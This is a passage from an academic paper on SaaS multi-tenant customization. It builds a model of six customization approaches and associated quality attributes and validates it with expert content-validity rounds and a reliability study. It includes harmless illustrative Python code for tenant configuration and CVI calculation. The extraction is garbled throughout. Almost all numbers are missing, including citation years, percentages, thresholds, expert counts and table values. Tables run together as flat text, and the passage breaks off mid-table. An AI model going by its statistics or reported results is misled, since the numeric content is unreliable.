subjects distributed and parallel computing, emerging technologies, software engineering
keywords customization approaches, content validity, iterative method, model development, reliability study, saas quality, software as a service

introduction
software maintenance comprises a significant portion ( %) of the total software implementation costs (lee, park & lim, ). according to yang, yoo & jahng ( ), "more than % of the it budget is spent just maintaining and running existing systems and software infrastructure". the increase in development and operating costs, which was also one of the main reasons for the failure of the application service provider (asp) model in the s (de miranda, ), is inevitable. as a result, demand for the software as a service (saas) model is increasing because the costs of hardware, technology, maintenance, and tenant management are lower (walraven, ; walraven et al., ; shen et al., ; ali et al., ). some problems with the implementation of saas applications remain, however, such as customization complexities (walraven, ; walraven et al., ; guo et al., ; al-shardan & ziani, ; walraven, truyen & joosen, ). customization is an essential requirement for providing the same application to different users (walraven, ; ali et al., b), as they may have different business flows, interfaces, and data (tsai, zhong & chen, ). consequently, for the hosts of saas applications, this requirement poses quality challenges and risks (al-shardan & ziani, ; rolia et al., ). all saas application components are influenced by user-specific customization, including both functional and non-functional aspects of all layers of the saas architecture (tsai, shao & li, ). another complication is having to span multiple layers of the saas architecture (al-shardan & ziani, ). all saas application elements, including those with cross-layer relationships, must be customizable. moreover, customization includes adjustments to the software's source code, which becomes highly complex in the saas model (walraven, ; walraven et al., ; guo et al., ; sun et al., ).
changes in the requirements often occur after applications and services have been developed; therefore, runtime customization must be provided within the same software instance for different users (walraven, ; walraven et al., ; ali et al., a; van landuyt, walraven & joosen, ), and should not impact their privacy and the applications availability (walraven, ; van landuyt, walraven & joosen, ). generally, saas applications lack the customizability of on-premises applications (yang, yoo & jahng, ), which would result in reduced software maintenance (samir & darwish, ; xin & levina, ). by contrast, frequent customization of the saas application would require a burdensome maintenance process and pose a significant challenge to scalability and cost-efficiency (walraven et al., ; van landuyt, walraven & joosen, ). therefore, application vendors should be cautious about their technical capacity when making customization assessments (sun et al., ; samir & darwish, ), especially when customization impacts the crucial features of saas (walraven, ; walraven et al., ; joha & janssen, ; espadas et al., ). there is insufficient evidence in the available studies to assess the effect of software customization on saas attributes (ali et al., a). accordingly, it is important that the type of customization be specified to assess the associated impact and risk (chaumun et al., ) as the software quality are likely to be influenced by any change (parthasarathy & sharma, ; parthasarathy & sharma, ). although several researchers have reported the need to consider the customization of saas applications, no clear effort has been made to categorize software customization types and practices in a multi-tenant context. accordingly, research is required to establish a clear model that considers: ( ) generic software customization types and a list of common practices for each client in the saas multi-tenant context, and ( ) key quality attributes associated with customization. evidence ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the content validity and reliability of the proposed model are reported in detail in this study. two main calculations are considered for content validity: the item content validity index (i-cvi) of each customization practice and saas quality attributes, and the scale content validity index (s-cvi/ave). similarly, two quantities are evaluated to determine the internal consistency reliability of the model in this study: cronbach’s alpha coefficient, and the corrected item-total correlation. the structure of this manuscript is as follows. the next section discusses the related works. the third section presents the conceptualization of the model. the fourth section explains the methodology used, whereas the fifth section reports the results of the conducted study, followed by a discussion in the sixth section and threats to validity in the seventh section. finally, conclusions and future work are presented in the eighth section. related work this study presents an approach iteratively to develop, refine, and improve a software customization model for saas quality that was initially constructed in (ali et al., b). the main components of this model are the customization types, common customization practices of each type, and quality attributes of saas applications associated with customization. to the best of our knowledge, no model based on these criteria has been developed and validated. 
however, in this section, we review the literature on generic saas customization options, followed by the literature on quality models for saas applications. saas customization different types of customization based on the layers of saas architecture and customization objects have been suggested (li, shi & li, ; tsai & sun, ; al-shardan & ziani, ). li, shi & li ( ) illustrated five types of customization: gui customization, service customization, process customization, data customization, and cross-layer customization. tsai & sun ( ) considered the customization of gui, service, process, data, and qos. al-shardan & ziani ( ) defined three different types of saas customization: user interface, workflow, and access control. conversely, some studies classified saas customization based on how customization was performed. tsai & sun ( ) explained three types of customization: source code, composition, and configuration. based on where the customizations are hosted and executed, the work of müller et al. ( ) proposed three types of customization for multi-tenant saas applications: desktop integration, user-interface customization, and back-end customization. moreover, kabbedijk & jansen ( ) identified the types of customization in a tenant base. customization was classified as segment variability and tenant-oriented variability: in the former, customization is performed based on the requirements of a tenant community, whereas in the latter, it is performed based on the specific requirements of a tenant. the most closely related studies are listed and summarized in table . as table indicates, although there were some generic customization approaches proposed for saas, they did not explicitly declare the common customization practices for each approach. in addition, several inconsistencies are found across all proposals. for ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table a summary of generic classification of saas customization. references customization type based on li, shi & li ( ) gui , service , process, data and cross-layer saas architecture layers tsai & sun ( ) gui, service, process, data and qos saas architecture layers source code, composition and configuration manner of performing al-shardan & ziani ( ) gui, workflow and access control saas architecture layers müller et al. ( ) ui customization, desktop in- tegration and back-end cus- tomization manner of performing kabbedijk & jansen ( ) segment variability and tenant-oriented variability tenant and tenant’s community example, the term ‘‘user interface customization" is used in both (tsai & sun, ; müller et al., ), but with different meanings. additionally, these proposals argued for the relevance of this approach, yet they did not consider reporting a comprehensive validation either from academia or industry. saas quality many studies have focused entirely on defining and identifying the quality attributes of saas applications. for instance, khanjani et al. ( ) proposed a list of quality attributes for saas and provided their definitions and lee et al. ( ) proposed a comprehensive quality model for assessing saas cloud services. based on iso/iec (coallier, ), these authors identified characteristics and quality attributes and defined metrics to measure them. a systematic process was proposed by la & kim ( ) to build a high-quality saas application, taking the main saas design criteria into consideration. duarte filho et al. 
( ) proposed a ‘‘saas quality" method for evaluating the quality of saas applications. the saas quality model, based on iso/iec (coallier, ) and it management models (publications service management, ; it governance institute, ), was generated as a part of the proposed method. another related study extracted the critical quality attributes for saas reusability and identified saas reusability metrics for every quality attribute (samir & darwish, ). cancian et al. ( ) have customized software quality models to fit the saas context, classifying the saas quality criteria for products and processes and identifying quality attributes for each class. nadanam & rajmohan ( ) proposed a qos model for web services in cloud computing, similar to the work of (lee et al., ). some of these attributes have been included in the lee model. however, these attributes only address a few relevant aspects; many other significant features remain to be considered. these two models focus largely on user perspectives. table summarizes all the saas quality models reported in this study. although some works in table mention customizability as a quality attribute of saas applications, none of them focused on the quality attributes of saas applications associated with customization. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table a summary of proposed quality models for saas application. references quality attributes inspired by khanjani et al. ( ) reliability, resiliency, accuracy, efficiency, service response time, stability, functionality, customizability, suitability, accessibility, learnability, commonality, multi-tenancy, operability,serviceability, robustness, data integrity, data privacy, adaptability, extensibility, flexibility, scalability, changeability, composability, maintainability, security management, composability and availability. service measurement index (csmic ) lee et al. ( ) efficiency, reliability, scalability, availability and reusability. iso/iec (coallier, ) la & kim ( ) supporting commonality, supporting multi tenant’s access, accessible via internet, thin client model, functionality, high reusability, high availability and high scalability. key characteristics desired properties of saas in (espadas, concha & molina, ; manford ) duarte filho et al. ( ) functionality, usability, security, performance, support, service level, portability iso/iec (coallier, ), itil v (management ) and cobit . (tgi ), samir & darwish ( ) understandability, modularity, composability, complexity, customizability,reliability, availability, efficiency. literature analysis perfomed by the authors cancian et al. ( ) integrity,reliability, security, accessibility,requirements development and management, infrastructure capability, quality control, acquisition, testing, performance, utilization of standards, change control, interoperability,robustness, availability, maintenance, version control, technically competent in business, technically competent employees, prevision of continuity of service, scalability, help desk, process quality certification, governance,reputation. literature analysis perfomed by the authors nadanam & rajmohan ( ) availability,reliability, scalability, efficiency,reusability, understandability, publicity, adaptability and composability. literature analysis perfomed by the authors conceptual model based on a systematic mapping study (sms) conducted by ali et al. 
( ), the proposed model was initially constructed from customization practices and quality attributes in the saas multi-tenant context. each of the investigated customization practices was assigned to a customization approach (personalization, configuration, composition, modification, integration, and extension). these approaches were inferred from the most popular software customization proposals (ali et al., ). the model presented in this study, as shown in fig. , demonstrates the concept of all the approaches and saas quality. the purpose of the conceptual model is to analyze the variables in this study comprehensively. personalization approach the personalization approach refers to all solutions that provide transparent customization without needing to inform users (gilmore & pine, ; mathiassen & sandberg, ; sunikka & bragge, ). personalization involves gathering and analyzing datasets correlated to individuals and/or groups (tsai, shao & li, ; fan et al., ; tsai, huang & shao, ; truyen et al., ) accurately to implement services based on their ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure proposed model of this study. full-size doi: . /peerjcs. /fig- current and common preferences (tsai, shao & li, ; fan et al., ; truyen et al., ). moreover, a set of potential services is offered by publicly available pre-structured templates from saas providers (fan et al., ). the main data sources for personalization may be tenant or tenant communities (tsai, shao & li, ). recommendation mechanisms are often used with this approach to propose suitable services according to preferences, profiles, data, and service directories of the users (tsai, shao & li, ; fan et al., ). the personalization approach also considers the meaning (semantics) of user and community data (tsai, shao & li, ; fan et al., ) by employing runtime behavior adaptation facilities to adapt the behavior of saas applications to the performance context (truyen et al., ; xiaojun, yongqing & lanju, ; aulbach et al., ). a summary of common customization practices related to personalization in the context of multi-tenant saas applications is given in table . configuration approach according to the configuration approach, solutions offer a predefined setting for the alteration of application functions within a predefined scope (sun et al., ; brehm, heinzl & markus, ; parhizkar, ; davenport, ). diversity is usually maintained by establishing predefined parameters, options, and components, treating each user individually (xin & levina, ; salih & zang, ; kabbedijk & jansen, ). each saas tenant has to be able to configure the application by employing techniques to modify the functions of the applications within established limits (xin & levina, ; zhang et al., ; li, shi & li, ). meanwhile, saas providers have to develop sets of services and plugins with which tenants perform configurations (zhao et al., ; mohamed et al., ). this type of saas application must enable tenants to create or select features based on the template repository (tsai, shao & li, ; tsai, huang & shao, ; saleh, fouad ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of personalization approach. id customization practice references par tenants profile tsai, shao & li ( ), fan et al. ( ), tsai, huang & shao ( ), truyen et al. 
( ) par tenants preferences tsai, shao & li ( ), fan et al. ( ), truyen et al. ( ) par tenants behavioral activities fan et al. ( ), truyen et al. ( ) par service directory fan et al. ( ) par recommendation mechanism tsai, shao & li ( ), fan et al. ( ) par semantics data tsai, shao & li ( ), fan et al. ( ) par runtime personalization truyen et al. ( ), xiaojun, yongqing & lanju ( ), aulbach et al. ( ) par tenants and tenants communities (info source) tsai, shao & li ( ) table multi-tenant saas customization practices of configuration approach. id customization practice references con pre-defined parameters and options xin & levina ( ), salih & zang ( ), kabbedijk & jansen ( ) con tenant configuration interface xin & levina ( ), zhang et al. ( ), li, shi & li ( ) con provider plugins zhao et al. ( ), mohamed et al. ( ) con customization templates tsai, shao & li ( ), tsai, huang & shao ( ), saleh, fouad & abu-elkheir ( ), ralph ( ), chen, li & kong ( ), ruehl & andelfinger ( ), tsai & sun ( ) con template repository tsai, huang & shao ( ), saleh, fouad & abu-elkheir ( ), tsai & sun ( ) con customization point shahin ( ), mietzner & leymann ( ) con feature selection mohamed et al. ( ), ying et al. ( ) con runtime configuration xin & levina ( ), gey, landuyt & joosen ( ), moens & de turck ( ), shi et al. ( ) con features deactivation nguyen, colman & han ( ), moens et al. ( ) & abu-elkheir, ; ralph, ; chen, li & kong, ; ruehl & andelfinger, ; tsai & sun, ). a set of components, which accommodate a variety of tenant needs, is provided in the application template. by selecting a relevant component set, tenants can personalize each customization point (shahin, ; mietzner & leymann, ). when a tenant wishes to subscribe to the saas application, the capabilities of each feature within the system are analyzed to determine whether they ought to be incorporated into the application (mohamed et al., ; ying et al., ). all configurations established by the tenants must be adapted during the applications runtime (xin & levina, ; gey, landuyt & joosen, ; moens & de turck, ; shi et al., ). in addition, a disabling or excluding option for some features could be provided (nguyen, colman & han, ; moens et al., ). table summarizes the common customization practices of the configuration approach in the context of multi-tenant saas applications. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of composition approach. id customization practice references com components consolidation and sharing saleh, fouad & abu-elkheir ( ), moens et al. ( ), moens, dhoedt & de turck ( ), liu et al. ( ), rico et al. ( ), ruehl, wache & verclas ( ), makki et al. ( ) com runtime composition moens et al. ( ), moens, dhoedt & de turck ( ), kumara et al. ( ), mietzner, leymann & papazoglou ( ), lee & choi ( ) com subcomponents composition kumara et al. ( ), schroeter et al. ( ), kumara et al. ( ) com decomposition shahin ( ), moens et al. ( ), gey et al. ( ) com components relationships li, shi & li ( ), shahin ( ), moens, dhoedt & de turck ( ) composition approach in this approach, the multiple interacting components of the saas application are consolidated and new components can be shared between tenants and end-users (saleh, fouad & abu-elkheir, ; moens et al., ; moens, dhoedt & de turck, ; liu et al., ; rico et al., ; ruehl, wache & verclas, ; makki et al., ). 
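to make the configuration approach more concrete, the sketch below shows one way such predefined, per-tenant configuration might look in code. it is only an illustrative example, not part of the validated model or of any cited system; the class, option names, and feature names are hypothetical.

```python
# illustrative sketch only: hypothetical option names, features, and class.
from dataclasses import dataclass, field

# provider-defined customization points: predefined parameters, options, and
# optional features that a tenant may switch on or off (nothing outside this scope).
ALLOWED_OPTIONS = {
    "invoice_layout": {"compact", "detailed"},
    "currency": {"usd", "eur", "myr"},
}
OPTIONAL_FEATURES = {"reporting", "audit_trail", "webhooks"}

@dataclass
class TenantConfiguration:
    tenant_id: str
    options: dict = field(default_factory=dict)
    enabled_features: set = field(default_factory=set)

    def set_option(self, name, value):
        # reject values outside the provider's predefined scope
        if value not in ALLOWED_OPTIONS.get(name, set()):
            raise ValueError(f"{value!r} is not a predefined option for {name!r}")
        self.options[name] = value

    def enable_feature(self, feature):
        if feature not in OPTIONAL_FEATURES:
            raise ValueError(f"unknown feature {feature!r}")
        self.enabled_features.add(feature)

    def disable_feature(self, feature):
        # feature deactivation: excluded features are simply not executed for this tenant
        self.enabled_features.discard(feature)

# two tenants share one application instance but keep separate configurations
acme = TenantConfiguration("acme")
acme.set_option("invoice_layout", "detailed")
acme.enable_feature("reporting")
globex = TenantConfiguration("globex")
globex.set_option("currency", "eur")
```

the point of the sketch is that all diversity stays within the provider's predefined limits, which is what distinguishes configuration from the code-changing approaches described later.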
different components of the saas applications that collaborate must be composed during runtime (moens et al., ; moens, dhoedt & de turck, ; kumara et al., ; mietzner, leymann & papazoglou, ; lee & choi, ). the final composition must take into consideration the subcomponents of the core application (kumara et al., ; schroeter et al., ; kumara et al., ). the composition approach enables simplification of the consolidated saas components (shahin, ; moens et al., ; gey et al., ) as the relationships and dependencies between them are considered (li, shi & li, ; shahin, ; moens, dhoedt & de turck, ). table summarizes the common customization practices of the composition approach in the context of multi-tenant saas applications. extension approach saas application can be extended by adding custom code to be compiled during runtime (saleh, fouad & abu-elkheir, ; mietzner & leymann, ; correia, penha & da cruz, ). furthermore, a set of extension points, which permit a customized service to be plugged in, must be provided (mietzner & leymann, ; correia, penha & da cruz, ; moens & de turck, ; salih & zang, ). the saas provider should also supply an open platform and an api, which allows developers to compile custom code (replacements for existing objects or extensions to them) into the business object layers of the application (zhao et al., ; müller et al., ). any extension to a saas application may be public or accessible only by an individual tenant (aulbach et al., ). table summarizes the common customization practices of the extension approach in the context of multi-tenant saas. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of extension approach. id customization practice references ext custom code insertion saleh, fouad & abu-elkheir ( ), mietzner & leymann ( ), correia, penha & da cruz ( ) ext extension points mietzner & leymann ( ), correia, penha & da cruz ( ) ext runtime extension moens & de turck ( ), salih & zang ( ) ext extension interface zhao et al. ( ), müller et al. ( ) ext replacements of existing code müller et al. ( ) ext private/public extension aulbach et al. ( ) integration approach in this case, the saas application must be capable of incorporating extra services via external saas providers (aulkemeier et al., ; sun et al., ; almorsy, grundy & ibrahim, ; scheibler, mietzner & leymann, ). most saas service customers assume that the saas application will merge easily with their in-house systems (müller et al., ; aulkemeier et al., ; sun et al., ; scheibler, mietzner & leymann, ; zhang, liu & meng, ). however, this integration must consider nonfunctional elements, such as security controls, which should be accommodated by the applications architecture (sun et al., ; almorsy, grundy & ibrahim, ), at both design time and runtime (aulkemeier et al., ; sun et al., ). integration platforms may present a service framework, responsible for assimilating services, and process frameworks, through which business processes can be executed (aulkemeier et al., ; sun et al., ). any additional services from third-party saas providers must employ different programming languages and run in different environments (scheibler, mietzner & leymann, ). in some cases, code or scripts will be utilized to incorporate these services (aulkemeier et al., ). 
incorporation requires an integration interface (aulkemeier et al., ; sun et al., ), synchronization toolkits, and data retrieval mechanisms to respond to the demands posed by integration (sun et al., ; zhang, liu & meng, ). in this study, the common customization practices related to the integration approach in the context of multi-tenant saas applications are summarized in table . modification approach this approach refers to techniques and solutions that alter the design or other functional requirements of the application by changing part of its source code (luo & strong, ; haines, ). the modifications must consider the allocation of resources to take the customized code into account, thereby ensuring operational cost-efficiency regarding maintenance and resource sharing among tenants (sun et al., ; moens & de turck, ; helmich et al., ). saas vendors must manage all elements of customization codes for any individual tenant without developing unique versions for each (sun et al., ). as a result, they should alter the code of the application when identical customizations are made by a considerable number of tenants (sun et al., ; moens & de turck, ). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of integration approach. id customization practice references int integration with another saas mohamed et al. ( ), aulkemeier et al. ( ), sun et al. ( ), almorsy, grundy & ibrahim ( ), scheibler, mietzner & leymann ( ) int integration with other on-premise applications müller et al. ( ), aulkemeier et al. ( ), sun et al. ( ), scheibler, mietzner & leymann ( ), zhang, liu & meng ( ) int non-functional integration sun et al. ( ), almorsy, grundy & ibrahim ( ) int runtime integration aulkemeier et al. ( ), sun et al. ( ) int service & process integration aulkemeier et al. ( ), sun et al. ( ) int integration of different pl applications scheibler, mietzner & leymann ( ) int third party code injection aulkemeier et al. ( ) int integration interface aulkemeier et al. ( ), sun et al. ( ) int synchronization & data retrieval tools sun et al. ( ), zhang, liu & meng ( ) table multi-tenant saas customization practices of modification approach. id customization practice references mod source code modifications sun et al. ( ), moens & de turck ( ), helmich et al. ( ) mod resources allocation for customized code sun et al. ( ), moens & de turck ( ) mod individual tenant basis sun et al. ( ) mod identical customizations sun et al. ( ), moens & de turck ( ) mod runtime modification moens & de turck ( ) mod dependency relationship of modified functions dong et al. ( ) mod namespaces, inheritance, and polymorphism lee & choi ( ) mod add or changes methods or attributes ziani & alshehri ( ), kong, li & zheng ( ) mod deletion of custom objects, methods, or attributes ziani & alshehri ( ), kong, li & zheng ( ) runtime code changes must consider the interrelationship between different functions, as one function can depend on one or several other functions simultaneously (dong et al., ). namespaces, inheritance, and polymorphism are often used to implement source code customizations in this case (lee & choi, ). source-code modifications are made by adding or deleting methods or attributes, or by changing the current implementation methods of the object (ziani & alshehri, ; kong, li & zheng, ). 
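the last point, promoting a customization into the shared code base once enough tenants have requested the same change, can be pictured with a small, hypothetical sketch; the request records, change signatures, and threshold below are illustrative assumptions, not values from the literature.

```python
# illustrative sketch only: request records, signatures, and the threshold are invented.
from collections import Counter

def customizations_to_promote(requests, threshold=5):
    """requests: iterable of (tenant_id, customization_signature) pairs.
    returns the signatures requested by at least `threshold` distinct tenants."""
    seen = set()
    tenants_per_change = Counter()
    for tenant_id, signature in requests:
        if (tenant_id, signature) not in seen:      # count each tenant once per change
            seen.add((tenant_id, signature))
            tenants_per_change[signature] += 1
    return [sig for sig, n in tenants_per_change.items() if n >= threshold]

requests = [
    ("t1", "add_field:invoice.tax_code"), ("t2", "add_field:invoice.tax_code"),
    ("t3", "add_field:invoice.tax_code"), ("t4", "change_method:order.totals"),
    ("t5", "add_field:invoice.tax_code"), ("t6", "add_field:invoice.tax_code"),
]
print(customizations_to_promote(requests))  # ['add_field:invoice.tax_code']
```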
table summarizes the common customization practices of the modification approach in the context of multi-tenant saas applications. saas quality the list of saas quality attributes in the proposed customization solutions for saas applications was provided in (ali et al., ), but the attributes were not defined. therefore, in this work, we focus on the definitions provided by (khanjani et al., ), which have been evaluated and validated in a ph d dissertation (khanjani, ). moreover, ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table quality attributes of saas applications associated with customization. id quality attribute defination references qa multi-tenancy saas services can support in- stances of simultaneous access by multiple users for multiple ten- ants. khanjani et al. ( ), la & kim ( ) qa scalability saas providers can manage growth or decline in the level of services. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), zia & khan ( ), akojwar et al. ( ), csmic ( ) qa availability saas services can function within a specific time to satisfy users needs. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), akojwar et al. ( ), csmic ( ), cancian et al. ( ), alhamad, dillon & chang ( ) qa reliability saas application maintains op- erating and functioning under given conditions without failure within a given time period. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), akojwar et al. ( ), csmic ( ), cancian et al. ( ), alhamad, dillon & chang ( ) qa maintainability modifications to the application are made by saas provider to re- tain it in the condition of good repair. khanjani et al. ( ), csmic ( ), cancian et al. ( ) qa security the effectiveness of saas provider’s controls on service data, access to the services, and the physical facilities from which service are provided. khanjani et al. ( ), csmic ( ) qa usability the ease with which saas service can be used to achieve tenant- specific-goal. khanjani et al. ( ), alhamad, dillon & chang ( ) qa interoperability saas service can easily inter- act with other services from the same saas provider or other providers. khanjani et al. ( ), csmic ( ), cancian et al. ( ) qa efficiency saas services effectively utilize resources to perform their func- tions. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), akojwar et al. ( ) qa functionality saas application provides an ex- tensive set of features. khanjani et al. ( ), csmic ( ) qa accessibility saas services are operable by users with different disabilities. khanjani et al. ( ), csmic ( ), cancian et al. ( ) qa commonality saas services possess common features and are amenable to reuse by multiple users. khanjani et al. ( ), la & kim ( ), lee et al. ( ), nadanam & rajmohan ( ) qa response time saas application adheres to a de- fined time limit between service request and service response. khanjani et al. ( ), csmic ( ), salama et al. ( ), badidi ( ), song et al. ( ), he et al. ( ), wang et al. ( ) these definitions were compared with those available in the literature provided by other saas quality models. the identification and definitions of the quality attributes that play an important role in saas customization or could be influenced by customization are presented in table . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure conceptual model of this study. full-size doi: . /peerjcs. 
/fig- all the customization practices for each approach and the quality attributes associated with the relevant saas applications are presented in fig. . in this study, all customization approaches are variables that may affect the quality of saas applications. in the remaining sections of this study, customization practices and quality attributes are labeled as items, while approaches and saas quality are labeled as ‘‘constructs". methodology the methodology of this study is composed of three main phases, as indicated in fig. . the first phase is the development of the customization model concept for saas quality, as presented in the previous section. the second and third phases consider the content validity and reliability of the model. rounds of content validity content validity is a vital topic for high-quality measurement (wynd, schmidt & schaefer, ). it holds that each item has a requisite sample of aspects that depicts the construct of interest (cohen, manion & morrison, ). in this study, this quantity was evaluated to validate the conceptual model. content validity is generally determined based on the opinion of experts, who analyze if the model or instrument correctly depicts its concept (bell, bryman, & harley, ; hair et al., ), in the field. to validate the conceptual model, a questionnaire was elaborated and provided to researchers who had previous experience in the saas customization field. these researchers were identified through an extensive systematic mapping study and ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure methodology phases of this study. full-size doi: . /peerjcs. /fig- selected based on their published papers and affinity with this study, researchers were identified (ali et al., ). a cover letter describing the objective of the questionnaire and asking some personal information on the background of experts was attached. as the available literature on the classification and identification of software customization approaches and related quality attributes in the saas multi-tenant context is insufficient, we conducted iterative content validity evaluation as recommended by (polit & beck, ; parratt et al., ; harris & holloway, ). while designing the data analysis for each round, we primarily followed the content validity index (cvi) method, which is the common method for this purpose (bhatti & ahsan, ), as guided by (polit & beck, ). the popularity of cvi is not only limited to educational, psychological, or nursing research, but also to other disciplines or research areas, such as researches in software engineering and information systems (bhatti & ahsan, ; yilmaz et al., ; wang et al., ). in this study, two quantities were calculated (polit & beck, ): . the item content validity index (i-cvi) for each item. . the scale content validity index (s-cvi/ave), which is an average of the i-cvis for each construct. lynn ( ) suggests that at least three experts should be present to evaluate the model; however, more than ten experts would probably be unnecessary (polit & beck, ). other scholars mention that at least five experts should be sufficient to validate the model (zamanzadeh et al., ). questionnaires that queried the relevance of each item with respect to its construct were, therefore, sent to a group of experts. 
as recommended by (polit & beck, ; lynn, ; davis, ), the respondent replied according to a -point ordinal scale in which , , and respectively corresponded to ‘‘not relevant’’, ‘‘somewhat relevant’’, ‘‘quite relevant’’, and ‘‘very relevant’’. the experts were also requested to provide further comments about each item and construct and about the overall model, including recommendations for improvement. after each round (after at least five experts had replied to the questionnaire), the inputs and suggestions were analyzed. any item that was deemed unclear or did not meet the ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. i-cvi criteria was either revised or removed. the rounds were suspended when the s-cvi and i-cvi criteria were achieved: . i-cvi of . with to experts (polit & beck, ; lynn, ). . i-cvi of . or higher for to experts (polit & beck, ; lynn, ). . s-cvi of . or higher (polit & beck, ; yamada et al., ). our intention in round was to revise the items that did not meet the i-cvi criteria rather than deleting them. the deletion of invalid items or constructs was left to the subsequent rounds. this strategy, therefore, allowed most of the items to be assessed more than one time. furthermore, the cvi analysis in all rounds had to be supplemented by computation of the kappa coefficient to remove possible chance agreement among the experts (shrotryia & dhanda, ; polit & beck, ). the evaluation criteria for kappa are fair = k of . – . , good = k of . – . , and excellent = k > . (zamanzadeh et al., ; shrotryia & dhanda, ; polit & beck, ). reliability study after the content validity was established, a study was conducted to determine the reliability of the model. thirty-four respondents from software engineering research groups, familiar with saas applications, were purposively sampled. they were from four malaysian universities, namely universiti putra malaysia, universiti kebangsaan malaysia, universiti malaysia pahang, and universiti tenaga nasional. the reliability of the measured items used in the survey was examined using cronbachs alpha internal consistency test. its results range from to , in which high numbers indicate high reliability. values greater than . are excellent; between . and . are good; between . and . are acceptable; between . and . are questionable, and below . are poor (sekaran & bougie, ). the reliability of the research instrument or model is related to its consistency and stability (sekaran & bougie, ; alkawsi, ali & alghushami, ). the reliability of the model was assessed using three quantities: . cronbach’s alpha value for each construct must be . or above. . corrected item-total correlation should exceed . . . cronbachs alpha if item deleted must be lower than that of cronbach’s alpha for a construct. results the results of the content validity evaluation and consistency tests are reported in this section. rounds of content validity we conducted two evaluation rounds for content validity between february and june , starting with version of the model produced in the conceptualization phase. it was revised after each round, generating versions and . the versions , , and questionnaires are provided in appendices a–c. in round , the questionnaire was sent to the first researchers identified by ali et al. ( ); only five experts replied and completed the content validity questionnaire. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. 
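for readers who wish to reproduce the quantities reported below, the following sketch computes the i-cvi, the s-cvi/ave, and the kappa adjustment for chance agreement in the usual way described by polit & beck (i-cvi is the proportion of experts rating an item 3 or 4; s-cvi/ave is the mean of a construct's i-cvis; kappa subtracts the binomial probability of chance agreement). the expert ratings in the example are hypothetical and are not the ratings collected in this study.

```python
# i-cvi, modified kappa, and s-cvi/ave; the ratings below are hypothetical.
from math import comb

def i_cvi(ratings):
    """ratings: list of expert scores on the 4-point scale (3 and 4 count as relevant)."""
    relevant = sum(1 for r in ratings if r >= 3)
    return relevant / len(ratings)

def modified_kappa(ratings):
    n = len(ratings)
    a = sum(1 for r in ratings if r >= 3)
    pc = comb(n, a) * 0.5 ** n          # probability that a experts agree by chance
    icvi = a / n
    return (icvi - pc) / (1 - pc)

def s_cvi_ave(construct_ratings):
    """construct_ratings: dict mapping item id -> list of expert ratings."""
    icvis = [i_cvi(r) for r in construct_ratings.values()]
    return sum(icvis) / len(icvis)

# hypothetical construct with three items rated by five experts
construct = {
    "item1": [4, 4, 3, 4, 3],
    "item2": [4, 2, 3, 4, 3],
    "item3": [2, 2, 3, 4, 1],
}
for item, ratings in construct.items():
    print(item, round(i_cvi(ratings), 2), round(modified_kappa(ratings), 2))
print("s-cvi/ave:", round(s_cvi_ave(construct), 2))
```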
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table basic research-related information of the experts participated in round . no designation research expertise experience researcher software engineering, software systems > associate professor software engineering < professor software engineering, software tools, model-driven development > associate professor software engineering > researcher software engineering, big data, ai < table basic research-related information of the experts participated in round . no designation research expertise experience assistant professor software engineering > professor software engineering > researcher software engineering, distributed & cloud computing > researcher software engineering, machine learning < associate professor software engineering, cloud computing > associate professor software engineering > therefore, in round , we considered sending it to all the researchers identified by ali et al. ( ) (including all the researchers who were addressed in round ); only six experts replied. tables and contain the basic research-related information of the experts who participated in rounds and . due to the satisfying level of consensus indicated by the i-cvi and s-cvi scores after the analysis of round , it was determined that an additional round was unnecessary; therefore, data collection was suspended. table demonstrates the level of consensus for each of the items in the two rounds as well as the initial items and constructs of round , and items and constructs of round . these items were deleted in round for the following reasons: . item con was removed as it was adequately measured by item con , thus item con was retained as its i-cvi ( . ) was higher than item con ( . ). . item mod was removed as it was applicable to all software developed with object- oriented approach. . item mod was merged with item mod as they complement each other. in round , consensus (i-cvi >= . ) was reached by the overall panel for of the items ( . %). an i-cvi of . was attained for items ( . %) and . for items ( . %). in addition, an i-cvi of . was attained for only of items ( . %). figure depicts the number of items in the i-cvi results. from our interpretation of the answers, the experts suggested that more refinement of the description was required for some items. the need for these refinements could have been avoided if the multi-tenancy concept was included. in round , the id of each item was redefined to reflect the resulting list of items from round . table also displays the i-cvis obtained from round . the , , , and of ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of i-cvi, s-cvi and kappa within content validity rounds. construct round_ round_ item_ i-cvi_ kappa s-cvi_ item_ i-cvi_ kappa s-cvi_ per . . per . . per . . per . per . . per . . per . . per . . per . . per . . per . . per . . per . per . . personalization a per . . per . . . con . . con . con . . con . con . con . con . con . con . con . . con . . con . . con . . con . con . . 